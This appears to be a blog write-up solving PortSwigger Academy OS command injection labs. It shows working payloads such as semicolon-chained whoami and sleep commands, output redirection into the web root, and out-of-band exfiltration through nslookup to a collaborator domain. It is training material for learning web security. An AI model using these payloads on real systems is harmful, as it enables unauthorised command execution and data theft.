OS Command Injection - [PortSwigger]

Cover Image for OS Command Injection - [PortSwigger]
Marmeus
Marmeus

Table of Contents

    Introduction

    In this post there is a compilation of every apprentice and practitioner lab related to the OS Command Injection topic from PortSwigger Academy.

    OS command injection, simple case [Apprentice]

    When checking the stock of a product, if you provide a ; instead of a number, you will get the following response.

    POST /product/stock HTTP/1.1
[...]

productId=%3b&storeId=1

# RESPONSE
/home/peter-yZTpOD/stockreport.sh: line 5: $1: unbound variable
sh: 1: 1: not found

    After the ;, if you try to add whoami, you will get the following result.

    # REQUEST
productId=%3b+whoami&storeId=1

# RESPONSE
/home/peter-yZTpOD/stockreport.sh: line 5: $1: unbound variable
whoami: extra operand '1'
Try 'whoami --help' for more information.

    Now that we know that the second parameter is also put on the command, we can put a comment so the script does not read it.

    # REQUEST
productId=%3b+whoami+#&storeId=1

# RESPONSE
peter-yZTpOD

    Blind OS command injection with time delays [Practitioner]

    As said in the exercise statement, we need to play with delays under the email form. So, trying the payload ;+sleep+10+# on every field, we obtain that the email parameter is vulnerable to OS command injection.

    Blind OS command injection with output redirection [Practitioner]

    The filed email, as in the previous exercise, is vulnerable to command injection.

    kali@kali:~$ curl -b "session=<YOUR_COOKIE>" -X POST https://<LAB_DOMAIN>.web-security-academy.net/feedback/submit -H "Content-Type: application/x-www-form-urlencoded" -d "csrf=<CSRF_TOKEN>&name=a&email=;+whoami+>+/var/www/images/test+#&subject=a&message=1"

    After redirecting the output, we can use the function to load images to retrieve the file's content.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=test
peter-mqAI1U

    Blind OS command injection with out-of-band interaction [Practitioner]

    The vulnerability is the same as before, but only we need to change the command.

    kali@kali:~$ curl -b "session=<YOUR_COOKIE>" -X POST https://<LAB_DOMAIN>.web-security-academy.net/feedback/submit -H "Content-Type: application/x-www-form-urlencoded" -d "csrf=<CSRF_TOKEN>&name=a&email=;+nslookup+<BURP_DOMAIN>+#&subject=a&message=1"

    Blind OS command injection with out-of-band data exfiltration [Practitioner]

    Same, but executing the whoami command, so it is concatenated as a collaborator's subdomain.

    kali@kali:~$ curl -b "session=<YOUR_COOKIE>" -X POST https://<LAB_DOMAIN>.web-security-academy.net/feedback/submit -H "Content-Type: application/x-www-form-urlencoded" -d 'csrf=<CSRF_TOKEN>&name=a&email=;+nslookup+$(whoami).<BURP_DOMAIN>+#&subject=a&message=1'